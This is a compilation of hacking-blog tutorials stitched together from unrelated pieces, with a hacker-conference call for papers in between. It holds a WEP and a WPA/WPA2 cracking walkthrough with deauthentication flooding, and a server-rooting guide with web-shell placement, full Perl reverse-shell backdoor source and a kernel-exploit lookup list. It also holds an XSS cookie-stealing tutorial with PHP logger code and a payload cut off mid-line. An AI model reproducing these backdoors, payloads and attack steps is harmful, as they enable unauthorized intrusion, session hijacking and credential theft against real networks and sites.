Wireless hack,Wifi hack & security

Acronyms

WEP Wired Equivalent Privacy
BSSID Basic Service Set Identifier
ESSID Extended Service Set Identifier
MAC Media Access Control
AP Access Point
APmac Access Point MAC
CLmac Client MAC

Introduction:

This document describes a generic approach to crack 64 / 128 bit WEP encryption key on a secure wireless network. The idea is to crack the WEP encryption key of the Access Point and connect to the access point using the recovered WEP key. To achieve this, I have set up a secure network consisting of an access point protected with 128 bit WEP key, a legitimate client connected to the access point and a attack machine which is not connected to the access point. Finally, provide countermeasures to cover the security issues in the system and to provide a secure configuration for the wireless setup.

This access point is configured to connect securely with the various legitimate clients using 64 / 128 bit WEP encryption key. In field scenario, once an attacker gains access to this WEP key, he/she will gain privilege to authenticate himself/herself with the access point. This will open door for many other wireless attacks. Some of them are as follows,

1) Physical Layer Attacks or Jamming
2) Spoofed Dissociation and De-authentication Frames Floods
3) Spoofed Malformed Authentication Frame Attack
4) Filling Up the Access Point Association and Authentication Buffers
5) Frame Deletion Attack
6) DoS Attacks Based on Specific Wireless Network Settings
7) Attacks Against 802.11i Implementations

In addition to this, if an attacker gains access to the WEP key, he/she can connect to the access point and can try to gain access to the configuration files through http by breaking the authentication mechanism.

Analysis

Overview of WEP

WEP relies on:

1) A key shared between all communicating parties.
2) An encryption algorithm, RC4.
3) A 24 bit initialization vector (IV).
4) A CRC of the frame payload.

Encryption Logic:

1) Checksum  An integrity checksum of the message is calculated and concatenated at the end of plain text message.
2) Encryption (RC4)  Plain text is encrypted using RC4.
i. An initialization vector (IV), v is chosen.
ii. RC4 generates a keystream as a function of v and key, k.
iii. The keystream is XORed with plain text to generate cipher text.

Objectives of WEP:

1) Confidentiality  To prevent eavesdropping so that the content of your traffic remains private.
2) Access Control  To discard all network packets that are not encrypted.
3) Data Integrity  To prevent network traffic from being modified or corrupted. This is main reason of including CRC with the plain text.

Major Attacks on WEP:

1) Passive Attacks  An attack in which an unauthorized party gains access to the wireless network but does not modify its contents or engage in communication with any node in the network. For example
i. Eavesdropping
ii. Traffic analysis by decrypting every packet that is sent over the wireless link.
2) Active Attacks  An attack in which an unauthorized party makes modifications to a message, data stream or file. For example
i. Masquerading
ii. Message modification
iii. Denial of service

Key Management:

1) The 802.11 standard does not address the issue of key management (how are keys distributed).
2) Usually one key is used for entire network.
3) Since everybody is using the same key, once a key is compromised for one session, the same key can be used to decrypt any other session.
4) It is also difficult to replace a compromised key. To achieve this, every single user would have to reconfigure their wireless network.
5) Reusing a single key also increases the chances of identifying a reused IV.

Problems with using RC4 Cipher:

1) The 802.11 protocol did not define how to implement IVs. The IV space takes 2^24 possible values which means that the secret share key should be changed as soon as possible IVs have been consumed but WEP defines not practical way to accomplish it.
2) WEP’s initialization vector duplication  the combination of shared key (k) and the repeated IV (v) results in repeated keystream.

Approach

Hardware Requirements:

Here is a list of required hardware,

1) Wireless Access Point  this will be the target access point.
2) Two laptops  Machine1 and Machine2. Machine1 is attacker’s machine and Machine2 is a legitimate user who can connect to the access point using WEP network key. Machine1 has no clue about the WEP network key of the access point.
3) A wireless network card. We used Netgear’s WPN 511 pcmcia card for Machine1. This card comes with Atheros chipset and has packet injection capabilities. Machine2 has an inbuilt wireless network card.

Note: Please make sure that the wireless card has the right chipset. Most wireless cards are programmed only to accept data that is addressed to them. Other cards, specifically the ones that are of use for wifi sniffing, are capable of picking up all traffic that is flying through the air. Common types are Atheros, Prism, Aironet, Realtek etc based cards.

Software Requirements:

Here is a list of required software,

1) Airodump-ng
2) Aireplay-ng
3) Aircrack-ng

Airodump-ng is used to sniff the wireless traffic. It will help us locate our access point and the client connected with it. It will also show us details like operating channel, data rate, beacons, encryption type etc.

Aireplay-ng is used to replay data packets to access points and clients. This technique is used to increase the data transfer rate between the access point and client in order to generate more IVs. More than 20,000 IVs are required to break the 64 bit WEP key and more than 70,000 IVs are required to break the 128 bit WEP key. Without implementing this technique, the attack becomes very slow.

Aircrack-ng is used to crack the WEP keys once we have sufficient IVs.

First of all, we need to configure the access point and client. Once the configuration is done we can leave them and go back to attack machine to break the WEP key implemented by the access point.

The first step is to configure a wireless network between the access point and the client laptop i.e. Machine2. This network will be secured with WEP key that we need to crack. Assign an SSID to your access point. Configure a 64 / 128 bit key.

Information gathering:

We would require following information to perform the attack,

1) MAC address of access point.
2) SSID of access point.
3) Wireless channel of access point.
4) MAC address of client associated with access point.

Setup Machine1 (Attack machine):

Insert the pcmcia wireless network card and boot the machine. Check the configurations using the following commands.

iwconfig.

By default, as in my case, you will see only one interface i.e. ath0. You will have to create a new wifi interface and put it to monitor mode. Use the following command:

wlanconfig ath1 create wlandev wifi0 wlanmode monitor

This will give you your wireless interface with name ath1 which will operate in monitor mode.

ifconfig ath1 up.

This will start the wireless network card.

If you want to use the existing interface i.e. ath0, use the following command to put it in monitor mode.

ifconfig ath0 mode Monitor.

This command will put the card in Monitor mode. This is important for passive listening and packet injection (+ your wireless network card should have packet injection capabilities).

Use the following command to verify if your card is ready to sniff the wireless traffic.

Iwlist ath1 scan

Attack

Following text describes the real attack which I performed on setup to crack the WEP encryption key.

Start airoudmp by typing the following command on your bash prompt,

airodump-ng –write data –ivs –band abg ath1

The above command will start airodump and will start sniffing wireless traffic. The different parameters are detailed below,

 –write will write out the data to a file with name “data”. Every time you specify the same output file name, such as “data”, airodump-ng will append the file name with “-##” such as data-01.ivs, data-02.ivs, etc.
 –ivs will capture only Initialization vectors
 –band will search for bands a,b and g

Your screen will be divided into two parts. The upper half will display the access points and the lower half will display the clients. Find your access point in the upper half of the screen and note down the MAC address or BSSID, ESSID and channel on which it is operating. We would require this information. Our aim is to collect as many IVs as possible. Every time data is exchanged between the access point and the associated client, each data packet will contain an IV. These IVs will then be fed to aircrack, in order to crack the WEP key.

Although, you will notice that tons of numbers (beacons) are flying by, but the data is not updating very quickly. This is because airodump is searching all the channels. From upper half of the screen, we can find out the channel on which our access point is operating. In my case, it was 11. Abort airodump and re-run it to sniff on specific channel. Use the following command,

airodump-ng –channel 11–write data –ivs –band abg ath1

Airodump will start running at much faster rate now and updating the data constantly. You will see a number rising very quickly, this is generally the beacons. Beacons just basically say “hey, i’m an access point” about 10 times a second. You can judge the quality of your connection by how frequently the beacon rises. Other than this, they are useless for our purposes. For this type of attack it is important for there to be a client connected to the access point. So connect machine2 to the access point wirelessly using the WEP encryption key. In airodump, you should see at the bottom a client pop up, the first MAC is the access point and the 2nd is the Client associated with it. Write down the MAC address or BSSID of the client.

Open a new bash prompt and type the following command,
aireplay-ng -2 -b APmac -d ff:ff:ff:ff:ff:ff -m 68 -n 68 -p 0841 -h CLmac ath1
where APmac is the MAC address of the access point and CLmac is the MAC address of the client i.e. Machine2, in our case. –d parameter is used for broadcasting the data. Aireplay will now start sniffing for a certain type of packet with a length no more and no less than 68 bytes between client and access point. It will display- “Read ### packets”. At this point, if there is significant data transfer between the client and access point, it will pull the right packet and will prompt you to use it. In this case, hit Y to use the packet and skip the next step. If however, it keeps reading packets for a while (more than a couple min) and does not pop up saying “Use this packet?” then open a new bash prompt and type the following command,
aireplay-ng -0 15 -a APmac -c CLmac ath1
The above command will send out 15 de-authentication packets to the client spoofing the identity of access point. So the client will think that the packets are coming from the legitimate access point and will disconnect itself from the wireless network and will try to re-connect after a while. It is this re-connection packet that we are trying to sniff.
Note: The normal data exchange rate between the access point and the client is not very fast. Collecting enough IVs at this rate to crack WEP keys will consume a lot of time. So we need to fasten up the process. This is done by sending data packets to access point at a faster rate. If the packet is valid and the access point think that the packet is coming from the legitimate client, it will send back the reply which will also contain the IV. We get a valid packet when the client tries to re-connect to the access point. Aireplay then uses this packet to flood access point spoofing its identity with the legitimate client.
Go back to first instance of aireplay and you should see something at the bottom of screen saying – “Use this packet”. Hit ‘y’ and aireplay will flood the access point with this packet. Switch back to airodump and you should see the data rate going up significantly.

If aireplay had picked up any more packets, it will prompt you again if you want to use them. Try more packets. Also, you may need to get closer to your access point or try the aireplay-ng -0 method again. Experiment with it. Once you’ve got the data rate going up quickly, start aircrack-ng to crack the WEP keys. Type in the following command,
aircrack-ng -f 2 -a 1 -b APmac -n 64 data-01.ivs
-n parameter could be 64 or 128 depending on the length of WEP key you have set in access point. Aircrack will scan the keys collected and will analyze the IVs. After a while of analysis, it will spit out the WEP encryption key.
The WEP encryption key has been successfully cracked.

Recommendation:
1) WEP is a weak implementation and contains many flaws. Switching to WPA1 or WPA2 with AES or TKIP will make the configurtion more secure.
2) There should be a mechanism to block a client who is continuously flooding AP or other clients with de-authentication packets.

Security assessment and deep testing don’t require a big budget. Some of most effective security tools are free, and are commonly used by professional consultants, private industry and government security practitioners. Here are a few to start with.
1.nmap
2.nessus
3.metasploit
4.nikto2
5.wireshark
For scanning in the first steps of a security assessment or pen test, Nmap and Nessus share the crown. Nmap is a simple, powerful and very well-reviewed scanner that one finds in the toolbox of any serious security consultant. Nmap and its Zenmap graphical interface are free and available at nmap.orgfor virtually any platform from Vista and OS X to AmigaOS, and will happily run on low-power systems.

For more information, Fyodor, the author of Nmap, maintains a somewhat dated but good list at sectools.org of the top hundred open-source and low-cost security tools other than Nmap.

Today you will learn the essentials to rooting any “insecure” box. Obviously if you are reading this i don’t think you will be using any 0-day kernel exploits . So basic things you will need for this tutorial to work for you will be the following:

Shell Access on a website is the first thing you will need. How you gain this access is entirely up to you. I would say most people will end up going with a simple remote file inclusion and place yourself a c99, r57, locust or any shell of your choice.

You will want to get yourself a version of NetCat Which you can find at this location If you have an antivirus that auto deletes infected files or virii i would suggest disabling it as some av’s will detect netcat as a hacktool or remote admin tool. Once you have downloaded netcat open netcat up and it will ask you to enter a string for the command line. Reading up on
netcat is recommended but if your lazy a string like this will do just fine
Code:

http://www.vulnwatch.org/netcat/nc111nt.zip

ex:

Code:

-vv -l -n -p <porttoconnecton>

From there you will want to aquire a nice back-connect. I preffer to use one thats not in the shell because i find that those back connects work shitty so i will provide you with one that i use. Very simple to use just save as “bc.pl” then upload to server and end execute.

ex:

Code:

perl bc.pl <youriphere> <porttoconnecton>

Code:

#!/usr/bin/perl
use IO::Socket;
# Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90
# Email:LorD@ihsteam.com
#
#wipu@SlackwareLinux:/home/programing$ perl dc.pl
#–== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==–
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#wipu@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#–== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==–
#
#[*] Resolving HostName
#[*] Connecting… 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 …
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#–== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==–
#
#–==Systeminfo==–
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#–==Userinfo==–
#uid=1001(lord) gid=100(users) groups=100(users)
#
#–==Directory==–
#/root
#
#–==Shell==–
#
$system = ‘/bin/bash’;
$ARGC=@ARGV;
print “IHS BACK-CONNECT BACKDOOR\n\n”;
if ($ARGC!=2) {
print “Usage: $0 [Host] [Port] \n\n”;
die “Ex: $0 127.0.0.1 2121 \n”;
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(’tcp’)) or die print “[-] Unable to Resolve Host\n”;
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print “[-] Unable to Connect Host\n”;
print “[*] Resolving HostName\n”;
print “[*] Connecting… $ARGV[0] \n”;
print “[*] Spawning Shell \n”;
print “[*] Connected to remote host \n”;
SOCKET->autoflush();
open(STDIN, “>&SOCKET”);
open(STDOUT,”>&SOCKET”);
open(STDERR,”>&SOCKET”);
print “IHS BACK-CONNECT BACKDOOR \n\n”;
system(”unset HISTFILE; unset SAVEHIST ;echo –==Systeminfo==– ; uname -a;echo;
echo –==Userinfo==– ; id;echo;echo –==Directory==– ; pwd;echo; echo –==Shell==– “);
system($system);
#EOF

**Note that if you are running a router or wireless on multiple ips set by your dhcp you might have to
forward the <porttoconnecton> to what ever the ip of your computer is. You can check this by opening
command prompt and typing ipconfig you should get an ip that looks similar to 192.168.1.100
which is the ip to forward to. If you are unsure about how to forward your port check out this site and
find your router model.

Code:

http://portforward.com/routers.htm

So Now that you have your tools and you have your shell access open up netcat and type in -vv -l -n -p 8080
for this tutorial we will connect on port 8080. Hit enter and it should start listening.

Go back to the server and upload your bc.pl. Execute the back connect with a command such as perl bc.pl <yourip> 8080.
once you execute this you can go back to the shell and it should have connected. With this particular back connect
you don’t have to find the kernel version because it displays it for you once it connects, but for those of you who are using a different back connect to find the os kernel version and userid you can type something like this into the shell and it will give you the info.

Code:

uname -a;id

Once executed you will see something probably similar to

Code:

Linux alexandra.adm24.de 2.6.8-2-686-smp #1 SMP Tue Aug 16 12:08:30 UTC 2005 i686 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)

The important information here that you want is the OS & Kernel Ver. which in this case would be
Linux and the kernel ver. is 2.6.8-2 and you can see the last update of it was in 2005 so it’s fairly
old. which is a good thing for us.

Here is a kernel refrence for you all this will tell you what exploits work for the differenet kernels.
just to give you a general idea. note that this refrence is kind of old but is still pretty accurate but
there could be newer exploits now.

Code:

2.2 -> ptrace
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
2.6.23 – 2.6.24 -> diane_lane_fucked_hard.c
2.6.17 – 2.6.24-1 -> jessica_biel_naked_in_my_bed.c

Once you have found the Kernel ver. of the server you are about to root you need to find the Local Root Exploit for that kernel which you can find with google using the list above. Once you have found your Exploit you will want to compile it assuming it’s in c which most are. To compile your xpl.c what you want to do is place the xpl.c on the server where you placed you bc.pl and then compile it. To Compile your c scripts go to your shell that you have spawned with netcat and type:
ex:

Code:

gcc xpl.c -o xpl

This will compile your xpl.c to a file named xpl.

From here now all you have to do is run your exploit which can be done by simply typing in your netcat connection

Code:

./xpl

It should execute the exploit file which you have just compiled and give you root depending on what the exploit requires.
some require nothing but running them. others such as require a large file to exploit or to be made to exploit. but this is just to explain how to root. you can read up from here if you would like.

Hope you enjoyed this tutorial and i hope it was helpful to you.

The Last HOPE (www.thelasthope.org) is this Summer’s hacker conference sponsored by 2600 Magazine.  Presenters and artists from all nationalities and disciplines are again invited to participate in this forum.  The Last HOPE covers all aspects of hacking, the community surrounding it, and its effects across the world.

For three days, The Hotel Pennsylvania will be the nexus of discussion, planning, and activity for hacker ideas, opportunities, and understanding.

There are several ways to participate:

• Speak: Presentation ideas should be submitted with a synopsis of the topic and presenter bio, and will be chosen by relevance and peer review.  Panels, talks, tutorials, debates, or other types of presentations are all welcome.  Most presentations will be 55 minutes.
• Interact: Demonstrations of new and interesting technologies or system elements as well as artistic exhibits are welcome.  We have 20,000 square feet of presentation space to fill, so projects of all sizes will be considered.  Robots, Segways, Legos, RFID, digital graffiti — submit your creative ideas!
• Display: Posters, presentations, demos, workshops, classes, and other ways of sharing information are encouraged.  Space and time will be provided to accommodate proposals.
• Sell or Exhibit: Space will be available for vendors to sell products of interest to the hacker community.  Details will be posted later to the HOPE website.
• Teach: Share your knowledge with others during formal and informal workshops. Hands-on instruction is particularly welcome.
  Do you have a lab, factory, warehouse, or other “hacker space”?  Do you know there are other hackers in your area who want to build one?  The Last HOPE is building the first “hackerspace village” to help bring together existing project spaces and inspire efforts to build them.  Show hackers from around the world how you built your space, what you’re doing with it, or what you would do if you had one!   Learn about, build, and help grow the global hackerspace movement.  E-mail hackerspace@hope.net with some details about your space or plans for building one!

Topics related to all aspects of hackers and hacking are welcome. In past years, sessions have included these themes:

• New technologies
• Effects of new laws and business models
• Hackers and activism
• Telephone systems
• Radio communication
• Intelligence gathering
• Lockpicking
• Privacy
• System internals vulnerabilities
• Copy protection
• Strong crypto
• Data exchange
• Voting systems
• Social engineering
• Programming techniques
• Hacker Ethics
• Stories from K-12
• Systems administration
• Worms and viruses
• The Man and how to avoid him
• Information privacy
• International cooperation
• Peer to peer networks
• Wireless
• Culture jamming
• Low-power broadcasting
• Black hats and white hats
• Cyberterrorism and cyber protests
• Teaching hacking
• Physical explorations
• Hacker spaces

Other topics are welcome, especially those offering fresh views and new variants on old themes.  Submissions should be sent to speakers@hope.net and include names (or aliases) and email addresses in addition to information requested above.

Conference planning is ongoing throughout the Spring, so submit your ideas or suggestions as early as possible.  Late proposals will be considered if space is available.

For more information about The Last HOPE, check the web pages at www.thelasthope.org.  The web pages provide opportunities to volunteer, information about travel and hotel, and information about speakers, tutorials, and other sessions.

Hi Friends Just i have started to learn XSS ,below is basic Tutorial by “XXx”

Tools used: Free hosting that support php
2 php pages
Vulnerable site.

Let’s work: First register a free hosting account. You can try on this sites: http://www.funpic.de ; http://www.altervista.org ; http://www.netsons.org

After all: registration and activation, we need to upload this 2 php pages on the site.
vb.php
PHP Code:
<head>
<meta http-equiv=”Content-Language” content=”it”>
<title>Cookies Stealther – Designed and programmed by R00t[ATI]</title>
</head>

<body bgcolor=”#C0C0C0″>

<p align=”center”><font color=”#FF0000″>COOKIES STEALTHER</font></p>
<p align=”center”><font face=”Arial” color=”#FF0000″>By R00T[ATI]</font></p>
<p align=”left”>&nbsp;</p>

</body>

documents.php
PHP Code:
<?php

$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET[c];

$time = date(”Y-m-d G:i:s A”);
$text = “<br><br>”.$time.” = “.$ip.”<br><br>User Agent: “.$agent.”<br>Referer: “.$referer.”<br>Session: “.$data.”<br><br><br>”;

$file = fopen(’vb.php’ , ‘a’);
fwrite($file,$text);
fclose($file);
header(”Location: http://www.google.com“);

?>
Vb.php file is used to SHOW at the attacker what cookies are grabbed and other information.
documents.php file is used to GRAB information at the victim like: ip address, user agent and naturally cookies.
Now, we need to find vulnerable site to Cross Site Scripting (XSS). After this insert a script that call documents.php that grab document cookie by using “c” method: documents.php?c=”+document.cookie;
For example:
Code:

http://vulnerable-site.com/vulnerable_page.php?vulnerable_method=<script>docume

WifiZoo is a tool to gather wifi information passively. It is created to be helpful in wifi pentesting and was inspired by ‘Ferret‘ from Errata Security.

The tool is intended to get all possible info from open wifi networks (and possibly encrypted also in the future, at least with WEP) without joining any network, and covering all wifi channels.

WifiZoo does the following:

-gathers bssid->ssid information from beacons and probe responses *(now the graph contains the ssid of the bssid , new in v1.1)*
-gathers list of unique SSIDS found on probe requests (you can keep track of all SSIDS machines around you are probing for, and use this information on further attacks)*new in v1.1*
-gathers the list and graphs which SSIDS are being probed from what sources *new in v1.1*
-gathers bssid->clients information and outputs it in a file that you can later use with graphviz and get a graph with “802.11 bssids->clients”. It gathers both src and dst addresses of packets to make the list of clients so sometimes you get weird graphs that are fun to analyze (basically, because I still need to omit multicast dst addresses and things like that). Using the dst address means that sometimes you get mac addresses of wifi devices that are not near you, but I think gives you information about the wifi ‘infrastructure’, again, I think .
-gathers ‘useful’ information from unencrypted wifi traffic (ala Ferret,and dsniff, etc); like pop3 credentials, smtp traffic, http cookies/authinfo, msn messages,ftp credentials, telnet network traffic, nbt, etc.
-and I think that’s it.

and remember.. WifiZoo is work in progress…

Channel Hopping

WifiZoo just listens on a wifi interface and will not do channel hopping by itself (this is sthg inside the huge TODO list the tool has). right now, I do channel hopping using Kismet, weird perhaps, but it works:

-Configure Kismet to do channel hopping
-run kismet
-run wifizoo and wait

For example, you can customize how Kismet does channel hopping thru the kismet.conf file by modifying the following options:

channelhop
channelvelocity
channeldwell
defaultchannels
sourcechannels

you can confIgure how much time to spend on each channel, which channels to hop thru, etc.

What do you need to run WifiZoo?

-python
-scapy
-kismet if you want to do channel hopping (although you can probably come up with a script instead of installing kismet just to do channel hopping)
-logs are stored in ./logs/, make sure this directory is created before running the tool .

TODO

Mmm, lots of things TODO. you’ll notice.

Wifi bssids->clients graphs

This is perhaps the most fun, because everyone loves graphs, right?. The bssid->clients file is stored in ./logs/clients.log, to generate the graph do:

dot -Tpng -oclients.png clients.log

clients.png will be the file with the graph.

You can download WifiZoo v1.3 here:

wifizoo_v1.3.tgz

NetStumbler
Netstumbler also famously known as Network Stumbleris a good tool which acilitates dedecting of Wireless Lans using the 802.11b, 802.11a and 802.11g WLAN standards it runs on microsoft OS from Win98 – Win Vista, there is anothere version called Mini Stumbler which is available for the handheld Windows CE operating System.
you can get it here

Aircrack
The fastest available WEP/WPA cracking tool
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).
you can get Aircrackhere

Airsnort
802.11 WEP Encryption Cracking Tool
AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It was developed by the Shmoo Group and operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. You may also be interested in the similar Aircrack.
you can get AirSnort here

Cowpatty
This Cowpatty is good brute force tool for cracking WPA-PSK, considered the “New WEP” for home Wireless Security. This program simply tries a bunch of different options from a dictionary file to see if one ends up matching what is defined as the Pre-Shared Key.
you can get Cowpatty here

Asleap
This Tool is really good for when the network is using Leap. this tool can be used to gather the authentication data that is being passed across the network, and these sniffed credentials can be cracked. LEAP doesn’t protect the authentication like other “real” EAP types, which is the main reason why LEAP can be broken
you can get LEAP here

Ethereal
Ethereal is used by all around the world by both Wind0s and opensource Operating system, its used for troubleshooting, analysis, software and protocol development, and education. It has all of the standard features you would expect in a protocol analyzer, and several features not seen in any other product. Its open source license allows talented experts in the networking community to add enhancements
you can download Ethereal here

by Ne0

Hi Friends This Is my 2nd Tutorial ,Today i will be Teaching u how to Crack a Wireless WPA / WPA2 TKIP or TKIP+AES Network using Ubuntu 7.10
whats the Difference Between cracking a WPA network and WPA2 network,Nothing !! There is no difference between cracking a WPA or WPA2
networks at all.In order to sucessfully crack any WPA/WPA2 network,there are 2 main things must happen
1) U must capture the Full 4 Way Handshake.
2) Your Passphrase must be in the DICTIONARY you choose in order to sucessfully BruteForce.
We will be using the aircrack-ng suite of tools and a small dictionary file on Ubuntu.

There are a few ways to crack a WPA / WPA2 PSK password this is just one of them.

This method is usally vunerable because of the end user, as most people will use a pass phrase thats easy to remember.
bcz evry body doesnt want to keep long password.

You will need the following details

A Client connected to the AP to Deauth
ESSID = this is the Name of your wireless network i.e MYWIRELESS
BSSID = this is the MAC address of your AP and will be in this format 00:1C:10:26:A9:39 everyone’s is different so make sure you write it down correctly or the following will not work
Channel = This will be the channel your AP is Broadcasting on i.e channel 7
ALSO you will need a decent dictionary file you can find many of these around on the internet google is your friend on this one,

then lets start

below are the Steps

Step 1 – Start the wireless interface in monitor mode

Airmon-ng strat wifi0 (starts ur Interface with Monitor mode)
Airodump-ng ath0 (Monitors the Access point available)

Step 2 – Start airodump-ng to collect authentication handshake

Airodump-ng -c 11 -w psk –bssid 00:1C:10:26:A9:39 ath0

Where:

-c 11 is the channel for the wireless network

- -bssid 00:1C:10:26:A9:39 is the access point MAC address. This eliminate extraneous traffic.

-w psk is the file name prefix for the file which will contain the IVs.

ath0 is the interface name.

Important: Do NOT use the ”- -ivs” option. You must capture the full packets.

Step 3 – Use aireplay-ng to deauthenticate the wireless client

aireplay-ng -0 3 -a 00:1C:10:26:A9:39 -c 00:0F:B5:EC:99:6F ath0

Where:

-0 means deauthentication

3 is the number of deauths to send (you can send muliple if you wish)

-a 00:1C:10:26:A9:39 is the MAC address of the access point

-c 00:0F:B5:EC:99:6F is the MAC address of the client you are deauthing

ath0 is the interface name

Step 4 – Run aircrack-ng to crack the pre-shared key

aircrack-ng -w dictionary.txt -b 00:1C:10:26:A9:39 psk*.cap

Where:

-w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.

*.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.

Done now wait for some time It depends upon ur Dictionary file and the passphrase ,

You should now have your PSK passphrase

&<>evilmonkey000<>&

Nothing is Impossible All kind of phassphrasses can be cracked until there is a patch for Human stupidity Bcz now there is no Patch for Human stupidity.

and u can also see my Video below

http://s288.photobucket.com/albums/ll167/3vilmonkey1983/?action=view&current=WPAandWPA2Cracking1.flv

comming soon Next Tutorial on Cracking WPA/WPA2 With Airolib-ng Database for Fast Cracking with Huge Dictionary

Tutorial by
(Wireless Punter)

Hi Friends today i will be telling about WPA and WPA2 ,